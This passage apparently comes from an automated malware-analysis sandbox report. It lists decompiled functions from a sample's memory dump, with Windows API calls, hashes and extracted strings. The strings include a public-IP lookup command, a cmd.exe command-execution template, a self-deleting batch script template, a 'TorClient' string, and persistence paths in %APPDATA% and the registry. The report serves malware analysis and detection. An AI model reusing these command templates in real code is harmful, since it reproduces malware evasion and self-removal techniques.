memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007), ref: 00B17F53

Strings

http://, xrefs: 00B17F27, 00B17F30
https://, xrefs: 00B17F1E
Host:, xrefs: 00B17EE3

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID: Host:$http://$https://
API String ID: 1819133394-2811860193
Opcode ID: d5af6f9768b395c2dd8ae6ff707e27a02cc8b203f0a373da9adb3b0549ec98d9
Instruction ID: 23fd0354c2aa1e18d97ac0067ed7d874d1d5df0dfbd0c0d876abdbc16923e382
Opcode Fuzzy Hash: d5af6f9768b395c2dd8ae6ff707e27a02cc8b203f0a373da9adb3b0549ec98d9
Instruction Fuzzy Hash: 76218172900219BBDB119FA8DC85F9EBBECEF14744F5441A1BD04DB251DA70DD81CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B2209D, Relevance: 15.3, APIs: 10, Instructions: 274memorythreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 00B22114
VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 00B22133
GetLastError.KERNEL32 ref: 00B223F0
RtlEnterCriticalSection.NTDLL(?), ref: 00B22400
RtlLeaveCriticalSection.NTDLL(?), ref: 00B22411
RtlExitUserThread.NTDLL(?), ref: 00B2241F

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AllocCriticalSectionVirtual$EnterErrorExitLastLeaveThreadUser
String ID:
API String ID: 2137648861-0
Opcode ID: 17da203a08a9985e9c24d5005d47004a1698f056aeb84a032322d1abd7db7c1c
Instruction ID: 079f0a656ec456f6b9dd29b43b53202ea4224f552fe8fef14e7075c543c9c4a9
Opcode Fuzzy Hash: 17da203a08a9985e9c24d5005d47004a1698f056aeb84a032322d1abd7db7c1c
Instruction Fuzzy Hash: 67A148B1500329EFDB209F21EC84AAA7BF9FF18305F2045A9F91AD21A1DB759C59CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00B20E10, Relevance: 15.1, APIs: 10, Instructions: 94filememorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B18BC3: memset.NTDLL ref: 00B18BE5
Part of subcall function 00B18BC3: CloseHandle.KERNEL32(?,?,?,?,?), ref: 00B18C92

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 00B20E57
CloseHandle.KERNEL32(?), ref: 00B20E63
PathFindFileNameW.SHLWAPI(?), ref: 00B20E73
lstrlenW.KERNEL32(00000000), ref: 00B20E7D
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B20E8E
wcstombs.NTDLL ref: 00B20E9F
lstrlen.KERNEL32(?), ref: 00B20EAC
UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 00B20EE2
HeapFree.KERNEL32(00000000,00000000), ref: 00B20EF4
DeleteFileW.KERNEL32(?), ref: 00B20F02

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
String ID:
API String ID: 2256351002-0
Opcode ID: 4701538802563be9c6fcb5242a5b4c1299e2db5f76cb4a28c8ecaa7efb7b448f
Instruction ID: dc682064fd017bf49c925bfbac5773ab9c6c256e26e447ac8859bbf34ed876d3
Opcode Fuzzy Hash: 4701538802563be9c6fcb5242a5b4c1299e2db5f76cb4a28c8ecaa7efb7b448f
Instruction Fuzzy Hash: 18312771800219FFCF21AFA4ED888AFBBB9FF04345B5444A9F906A3161DB318E51DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B359F7, Relevance: 15.1, APIs: 10, Instructions: 64sleepsynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00B18A31,?,00000000,00B30F94,00000000,00000000), ref: 00B35A0B

Part of subcall function 00B251FB: InterlockedExchange.KERNEL32(00000002,000000FF), ref: 00B25202

WaitForSingleObject.KERNEL32(?,000000FF,0000003C,?,00000000,00B30F94,00000000,00000000), ref: 00B35A25
CloseHandle.KERNEL32(?,?,00000000,00B30F94,00000000,00000000), ref: 00B35A2E
CloseHandle.KERNEL32(?,0000003C,?,00000000,00B30F94,00000000,00000000), ref: 00B35A3C
RtlEnterCriticalSection.NTDLL(00000008), ref: 00B35A48
RtlLeaveCriticalSection.NTDLL(00000008), ref: 00B35A71
Sleep.KERNEL32(000001F4,00B30F94,00000000,00000000), ref: 00B35A80
CloseHandle.KERNEL32(?), ref: 00B35A8D
LocalFree.KERNEL32(?), ref: 00B35A9B
RtlDeleteCriticalSection.NTDLL(00000008), ref: 00B35AA5

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
String ID:
API String ID: 1408595562-0
Opcode ID: 20be02c569de3ce06bfa35a63d05cbcc9d380176b375a11e36bb42946c321705
Instruction ID: 9844202bbfbef85996b9429f53509af2101dc1bed23ad95f3b59d59c70b64d11
Opcode Fuzzy Hash: 20be02c569de3ce06bfa35a63d05cbcc9d380176b375a11e36bb42946c321705
Instruction Fuzzy Hash: F9113471140B15AFCA30AB65EC88A5EB7E8FF08301B240A58F68693521CF34E8449BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B3209D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 00B320C8
StrTrimA.SHLWAPI(00000000,0A0D0920), ref: 00B320E5
HeapFree.KERNEL32(00000000,00000000), ref: 00B32118
RtlImageNtHeader.NTDLL(00000000), ref: 00B32143
HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 00B32200

Part of subcall function 00B232D8: lstrlen.KERNEL32(?,00000000,73B76980,?,00B2AEA4,?), ref: 00B232E1
Part of subcall function 00B232D8: memcpy.NTDLL(00000000,?,00000000,?), ref: 00B23304
Part of subcall function 00B232D8: memset.NTDLL ref: 00B23313

lstrlen.KERNEL32(00000000,00000000,0000014C,00000000,00000000), ref: 00B321AF
HeapFree.KERNEL32(00000000,00000000,00000000,0000014C,00000000,00000000), ref: 00B321E0

Strings

TorClient, xrefs: 00B3217E, 00B321CB

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
String ID: TorClient
API String ID: 239510280-3399603969
Opcode ID: cf6f93691f8cf911d2d668e5b60e7cd5647c2a2948478b005537b40893602fe6
Instruction ID: 6b178d260ee55692a9924e045e3a6156e1475a962b4a547eca4254add2024d90
Opcode Fuzzy Hash: cf6f93691f8cf911d2d668e5b60e7cd5647c2a2948478b005537b40893602fe6
Instruction Fuzzy Hash: 9441B035640609FBEB225B98DD85FAE7BE9EB44B50F3000A5FA05BB1A0DFB08E44D750

Uniqueness

Uniqueness Score: -1.00%

Function 00B2091D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000001,00000000,00000000,73B75520,00B16990,73B75520,00000001,@ID@,00B2F47B,?), ref: 00B20934
lstrlen.KERNEL32(?), ref: 00B20944
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B20978
RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 00B209A3
memcpy.NTDLL(00000000,?,?), ref: 00B209C2
HeapFree.KERNEL32(00000000,00000000), ref: 00B20A23
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 00B20A45

Strings

W, xrefs: 00B20A71

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$Allocatelstrlenmemcpy$Free
String ID: W
API String ID: 3204852930-655174618
Opcode ID: beab1eb8134b3e268b3591eb735befa6153d212f50e9e781e6a1829994c8603a
Instruction ID: e1046ab95c6d19191c959e944bf7db730240d333f324ba67b02b3f9e7ddb49cd
Opcode Fuzzy Hash: beab1eb8134b3e268b3591eb735befa6153d212f50e9e781e6a1829994c8603a
Instruction Fuzzy Hash: 9A4138B1910319EFDF10EF94DC80AAE7BF9EF05344F5484A5F909A7222E7309A54DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B1A123, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 00B1A144

Part of subcall function 00B21B2B: lstrlenW.KERNEL32(00000000,00000000,00000094,%APPDATA%\Microsoft\,00000000,?,?,00B1A164,?), ref: 00B21B50
Part of subcall function 00B21B2B: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B21B62
Part of subcall function 00B21B2B: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00B1A164,?), ref: 00B21B7F
Part of subcall function 00B21B2B: lstrlenW.KERNEL32(00000000,?,?,00B1A164,?), ref: 00B21B8B
Part of subcall function 00B21B2B: HeapFree.KERNEL32(00000000,00000000,?,?,00B1A164,?), ref: 00B21B9F

RtlEnterCriticalSection.NTDLL(00000000), ref: 00B1A17C
CloseHandle.KERNEL32(?), ref: 00B1A18A
HeapFree.KERNEL32(00000000,?,?,00000001,.dll,?,00001000,?,?,?), ref: 00B1A242
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B1A251
HeapFree.KERNEL32(00000000,00000000,.dll,?,00001000,?,?,?), ref: 00B1A264

Strings

.exe, xrefs: 00B1A1A0, 00B1A1B2, 00B1A1E8
.dll, xrefs: 00B1A199

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
String ID: .dll$.exe
API String ID: 1719504581-724907077
Opcode ID: 032b684c3b40839c09bbd9d5687b797f92ae83ce4a670b353be9d348bce932a8
Instruction ID: efdca4c89dc1450f9e666459ab027d5e6108060553c33f3d0c2012f0dbd0abcb
Opcode Fuzzy Hash: 032b684c3b40839c09bbd9d5687b797f92ae83ce4a670b353be9d348bce932a8
Instruction Fuzzy Hash: 04418032A02615BBDB21AF94DC84AEE7BF9EF40700F5000A5F905A7160DF71EE84CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B31A07, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110memoryfilestringCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(00B3DF6C), ref: 00B31A19
lstrcpy.KERNEL32(00000000), ref: 00B31A4E

Part of subcall function 00B3134B: lstrlen.KERNEL32(?,00000008,00000000,?,73B75520,00B21372,?,?,00000000,00B11589,?,00000000,?,00B25B4A,?,00000001), ref: 00B3135A
Part of subcall function 00B3134B: mbstowcs.NTDLL ref: 00B31376

GetLastError.KERNEL32(00000000), ref: 00B31ADF
HeapFree.KERNEL32(00000000,?), ref: 00B31AF6
InterlockedDecrement.KERNEL32(00B3DF6C), ref: 00B31B0D
DeleteFileA.KERNEL32(00000000), ref: 00B31B2E
HeapFree.KERNEL32(00000000,00000000), ref: 00B31B3E

Part of subcall function 00B28800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28812
Part of subcall function 00B28800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B2882B
Part of subcall function 00B28800: GetCurrentThreadId.KERNEL32 ref: 00B28838
Part of subcall function 00B28800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28844
Part of subcall function 00B28800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28852
Part of subcall function 00B28800: lstrcpy.KERNEL32(00000000), ref: 00B28874

Strings

.avi, xrefs: 00B31A41

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
String ID: .avi
API String ID: 908044853-1706533258
Opcode ID: a46fc14ad6e09f04d684230a521b9481e084c557ca8eb8c18d6d7be71024385f
Instruction ID: 1bc67e9668bcfb91a329932a326c0c671c950ed7719e6d4657da34aed5ad2783
Opcode Fuzzy Hash: a46fc14ad6e09f04d684230a521b9481e084c557ca8eb8c18d6d7be71024385f
Instruction Fuzzy Hash: F931E632901214FBCB11AFA8DC84AADBBF9EB48751F308891F905E7150EF708E41D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B1DA1D, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 88memoryfilestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B28800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28812
Part of subcall function 00B28800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B2882B
Part of subcall function 00B28800: GetCurrentThreadId.KERNEL32 ref: 00B28838
Part of subcall function 00B28800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28844
Part of subcall function 00B28800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28852
Part of subcall function 00B28800: lstrcpy.KERNEL32(00000000), ref: 00B28874

lstrlen.KERNEL32(00000000,00000000,00000F00,00000000), ref: 00B1DA41

Part of subcall function 00B278E3: lstrlen.KERNEL32(00000000,73BCF730,-00000001,00000000,?,?,?,00B1DA5E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 00B278F4
Part of subcall function 00B278E3: lstrlen.KERNEL32(?,?,?,?,00B1DA5E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 00B278FB
Part of subcall function 00B278E3: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B2790D
Part of subcall function 00B278E3: _snprintf.NTDLL ref: 00B27930
Part of subcall function 00B278E3: _snprintf.NTDLL ref: 00B27959
Part of subcall function 00B278E3: HeapFree.KERNEL32(00000000,000000FF,00000000,?,?,?,?,00000000,000000FF), ref: 00B2797A

StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 00B1DACD
HeapFree.KERNEL32(00000000,00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 00B1DAEA
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 00B1DAF2
HeapFree.KERNEL32(00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 00B1DB01

Strings

nslookup myip.opendns.com resolver1.opendns.com , xrefs: 00B1DA4E
s:, xrefs: 00B1DAC3
ss: *.*.*.*, xrefs: 00B1DA83, 00B1DA88, 00B1DAAB

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
String ID: s:$nslookup myip.opendns.com resolver1.opendns.com $ss: *.*.*.*
API String ID: 2960378068-949792001
Opcode ID: 057f1fa450c3c090a8cf8c9c362edbca4f78332ce972b5dfcf238c54c379f650
Instruction ID: 32ba216f4ca8e01119be2295962a8a892016cafb368f819af5e7e413557538f4
Opcode Fuzzy Hash: 057f1fa450c3c090a8cf8c9c362edbca4f78332ce972b5dfcf238c54c379f650
Instruction Fuzzy Hash: F0214B72A04219BBDB10ABE99C85FEE7BFCEF08310F5405A4F605E2151EB70AA448761

Uniqueness

Uniqueness Score: -1.00%

Function 00B1EF65, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,?,?), ref: 00B1EF89

Part of subcall function 00B2C747: lstrcpy.KERNEL32(-000000FC,00000000), ref: 00B2C781
Part of subcall function 00B2C747: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,00B1EF96,?,?,?), ref: 00B2C793
Part of subcall function 00B2C747: GetTickCount.KERNEL32 ref: 00B2C79E
Part of subcall function 00B2C747: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,00B1EF96,?,?,?), ref: 00B2C7AA
Part of subcall function 00B2C747: lstrcpy.KERNEL32(00000000), ref: 00B2C7C4

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

lstrcpy.KERNEL32(00000000), ref: 00B1EFB9
wsprintfA.USER32 ref: 00B1EFCC
GetTickCount.KERNEL32 ref: 00B1EFE1
wsprintfA.USER32 ref: 00B1EFEF

Part of subcall function 00B24FB0: RtlFreeHeap.NTDLL(00000000,00000200,00B26EB2,00000000,00000100,00000200), ref: 00B24FBC

Strings

.bat, xrefs: 00B1EFAC
"%S", xrefs: 00B1EFC6
attrib -r -s -h %%1:%udel %%1if exist %%1 goto %udel %%0, xrefs: 00B1EFE9

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
String ID: "%S"$.bat$attrib -r -s -h %%1:%udel %%1if exist %%1 goto %udel %%0
API String ID: 1152860224-2880143881
Opcode ID: d10a83da69b886dd151cd29cd77eee557bb040b93cbd19808fa13044df52e324
Instruction ID: 37dad6c02ee510f91cbb394e1e1de20508d0370b4b2be979b725890e015a809a
Opcode Fuzzy Hash: d10a83da69b886dd151cd29cd77eee557bb040b93cbd19808fa13044df52e324
Instruction Fuzzy Hash: CE11E3725053227BC2103BA47C49EAF7ADCDF89754F2444A5FD48A3612DFB4DC008AB2

Uniqueness

Uniqueness Score: -1.00%

Function 00B278E3, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,73BCF730,-00000001,00000000,?,?,?,00B1DA5E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 00B278F4
lstrlen.KERNEL32(?,?,?,?,00B1DA5E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 00B278FB
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B2790D
_snprintf.NTDLL ref: 00B27930

Part of subcall function 00B1B598: memset.NTDLL ref: 00B1B5AD
Part of subcall function 00B1B598: lstrlenW.KERNEL32(00000000,00000000,00000000,7711DBB0,00000000,cmd /C "%s> %s1"), ref: 00B1B5E6
Part of subcall function 00B1B598: wcstombs.NTDLL ref: 00B1B5F0
Part of subcall function 00B1B598: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7711DBB0,00000000,cmd /C "%s> %s1"), ref: 00B1B621
Part of subcall function 00B1B598: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B2793E), ref: 00B1B64D
Part of subcall function 00B1B598: TerminateProcess.KERNEL32(?,000003E5), ref: 00B1B663
Part of subcall function 00B1B598: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B2793E), ref: 00B1B677
Part of subcall function 00B1B598: CloseHandle.KERNEL32(?), ref: 00B1B6AA
Part of subcall function 00B1B598: CloseHandle.KERNEL32(?), ref: 00B1B6AF

_snprintf.NTDLL ref: 00B27959

Part of subcall function 00B1B598: GetLastError.KERNEL32 ref: 00B1B67B
Part of subcall function 00B1B598: GetExitCodeProcess.KERNEL32(?,00000001), ref: 00B1B69B

HeapFree.KERNEL32(00000000,000000FF,00000000,?,?,?,?,00000000,000000FF), ref: 00B2797A

Strings

cmd /C "%s> %s1", xrefs: 00B2791F, 00B27927, 00B27952
echo -------- >, xrefs: 00B2794D

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
String ID: cmd /C "%s> %s1"$echo -------- >
API String ID: 1481739438-1722754249
Opcode ID: 130a0ad758f382308f25067470649da2f1c8ea5d83ebf3f125c44186c0083e35
Instruction ID: 1fb21297368cd6698b97e69d41d24a6bb49343edc6db3d40758b887b7d237b99
Opcode Fuzzy Hash: 130a0ad758f382308f25067470649da2f1c8ea5d83ebf3f125c44186c0083e35
Instruction Fuzzy Hash: 38116A72900228BBCF125F54EC41EDE7F6AEB497A0F2141A1F908A7260CB719A50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B2AF8A, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55memoryregistrystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00B1AB0F,00000000,00000000,00B3E280,?,?,00B14379,00B1AB0F,00000000,00B1AB0F,00B3E260), ref: 00B2AF9D
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 00B2AFAB
wsprintfA.USER32 ref: 00B2AFC0
RegCreateKeyA.ADVAPI32(80000001,00B3E260,00000000), ref: 00B2AFD8
lstrlen.KERNEL32(?), ref: 00B2AFE7
RegCloseKey.ADVAPI32(?), ref: 00B2B000
HeapFree.KERNEL32(00000000,00000000), ref: 00B2B00F

Strings

@%s@, xrefs: 00B2AFBA

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heaplstrlen$AllocateCloseCreateFreewsprintf
String ID: @%s@
API String ID: 3908752696-4128794767
Opcode ID: e9166fdc9b1c6a42553a411dc16391358843c109da506b3dc409f27dd36952da
Instruction ID: 04d09cdab00266947c33ea7da23dca5eac5bafebb161a474f47dcc4df16bf1f5
Opcode Fuzzy Hash: e9166fdc9b1c6a42553a411dc16391358843c109da506b3dc409f27dd36952da
Instruction Fuzzy Hash: C3015E36500208BFEB125B94FC89FAF7B7AEB48754F204021FA05961B0EFB29D54DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B314AB, Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,73B75520,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00B314C2
lstrlen.KERNEL32(?), ref: 00B314CA
lstrlen.KERNEL32(?), ref: 00B31535
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B31560
memcpy.NTDLL(00000000,00000002,?), ref: 00B31571
memcpy.NTDLL(00000000,?,?), ref: 00B31587
memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 00B31599
memcpy.NTDLL(00000000,00B383E4,00000002,00000000,?,?,00000000,?,?), ref: 00B315AC
memcpy.NTDLL(00000000,?,00000002), ref: 00B315C1

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: memcpy$lstrlen$AllocateHeap
String ID:
API String ID: 3386453358-0
Opcode ID: 5af828401035df776194245d31442fee6b87778dd3841f83616dabf3563fc363
Instruction ID: ed058d3d1f2aa846baefa5a467ef5e8e498edc0ea1f0dea019ebc4146640df75
Opcode Fuzzy Hash: 5af828401035df776194245d31442fee6b87778dd3841f83616dabf3563fc363
Instruction Fuzzy Hash: 30412A72D00219EBCF01DFA8DC81A9EBBF9EF58314F2544A6ED15A3211E731EA51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B2E710, Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2B8FB: RtlEnterCriticalSection.NTDLL(00B3E268), ref: 00B2B903
Part of subcall function 00B2B8FB: RtlLeaveCriticalSection.NTDLL(00B3E268), ref: 00B2B918
Part of subcall function 00B2B8FB: InterlockedIncrement.KERNEL32(0000001C), ref: 00B2B931

RtlAllocateHeap.NTDLL(00000000,00B326D1,00000000), ref: 00B2E761
lstrlen.KERNEL32(00000008,?,?,?,00B326D1,00000000), ref: 00B2E770
RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 00B2E782
HeapFree.KERNEL32(00000000,00000000,?,?,?,00B326D1,00000000), ref: 00B2E792
memcpy.NTDLL(00000000,00000000,00B326D1,?,?,?,00B326D1,00000000), ref: 00B2E7A4
lstrcpy.KERNEL32(00000020,00000008), ref: 00B2E7D6
RtlEnterCriticalSection.NTDLL(00B3E268), ref: 00B2E7E2
RtlLeaveCriticalSection.NTDLL(00B3E268), ref: 00B2E83A

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
String ID:
API String ID: 3746371830-0
Opcode ID: 2270529743345639c652458274e5ba4d0e9a32192e284ff53f18c9baf08b51c8
Instruction ID: 3e6bc33b8add4f7625ba6d76af4b4902abeac1d1c3ac334feea421f92df6db80
Opcode Fuzzy Hash: 2270529743345639c652458274e5ba4d0e9a32192e284ff53f18c9baf08b51c8
Instruction Fuzzy Hash: 74416871500715EFDB218F69EC84B5EBBF9FB04300F208559F8699B260DB70E954CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B24241, Relevance: 13.6, APIs: 9, Instructions: 90filesynchronizationCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,00B21ED8), ref: 00B24282
GetLastError.KERNEL32 ref: 00B2428C
WaitForSingleObject.KERNEL32(000000C8), ref: 00B242B1
CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 00B242D2
SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 00B242FA
WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 00B2430F
SetEndOfFile.KERNEL32(00000006), ref: 00B2431C
GetLastError.KERNEL32 ref: 00B24328
CloseHandle.KERNEL32(00000006), ref: 00B24334

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
String ID:
API String ID: 2864405449-0
Opcode ID: 1f404440ff0823cd0a4dbface04a45fda4345ecb3d44d4504e429dc155d504ae
Instruction ID: 2cbefcab673bf4b262cc6c428649015d17550f0a5df11be8aa99e395ba468182
Opcode Fuzzy Hash: 1f404440ff0823cd0a4dbface04a45fda4345ecb3d44d4504e429dc155d504ae
Instruction Fuzzy Hash: AC319830900218FBEB10CFA5ED49BAE7BB9EB04315F2041A4F914E60E0CB749E94DF66

Uniqueness

Uniqueness Score: -1.00%

Function 00B22EE9, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,00B1EF3A,00000008,00B279A9,00000010,00000001,00000000,0000012B,00B279A9,00000000), ref: 00B22F08
WriteFile.KERNEL32(?,00000001,?,?,?), ref: 00B22F3C
ReadFile.KERNEL32(?,00000001,?,?,?), ref: 00B22F44
GetLastError.KERNEL32 ref: 00B22F4E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 00B22F6A
GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 00B22F83
CancelIo.KERNEL32(?), ref: 00B22F98
CloseHandle.KERNEL32(?), ref: 00B22FA8
GetLastError.KERNEL32 ref: 00B22FB0

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
String ID:
API String ID: 4263211335-0
Opcode ID: 6f59ef8e5bb3b067deac540a1fdf5c333dea40c8d934b371624909a1754423b4
Instruction ID: 6a5b04d6a5c885ded4c5538fd2aba6dc010a297347843c93f28c325035efe844
Opcode Fuzzy Hash: 6f59ef8e5bb3b067deac540a1fdf5c333dea40c8d934b371624909a1754423b4
Instruction Fuzzy Hash: A8218172900228FFDB019FA8ED888DE7BB9FB48310F104461F909D7160DF708A44CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B204D7, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 00B20525
